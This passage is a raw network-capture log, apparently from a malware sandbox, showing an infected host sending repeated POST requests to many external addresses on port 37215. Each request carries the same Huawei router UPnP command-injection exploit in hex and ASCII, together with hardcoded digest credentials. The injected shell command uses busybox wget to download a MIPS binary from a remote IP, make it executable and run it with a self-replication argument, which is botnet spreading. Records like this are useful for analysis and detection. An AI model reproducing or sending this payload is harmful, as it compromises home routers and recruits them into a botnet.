2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1580192.168.2.134533041.94.109.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503814936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1581192.168.2.133529477.209.78.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503830910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1582192.168.2.1336822157.119.49.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503961086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1583192.168.2.133903641.101.22.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503983974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1584192.168.2.133614041.144.9.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504100084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1585192.168.2.135037841.85.59.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504157066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1586192.168.2.1343072197.159.243.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504465103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1587192.168.2.1354832197.67.184.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504482985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1588192.168.2.1339514157.253.89.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504527092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1589192.168.2.1357572197.36.113.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504559994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1590192.168.2.135007641.200.13.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.504582882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
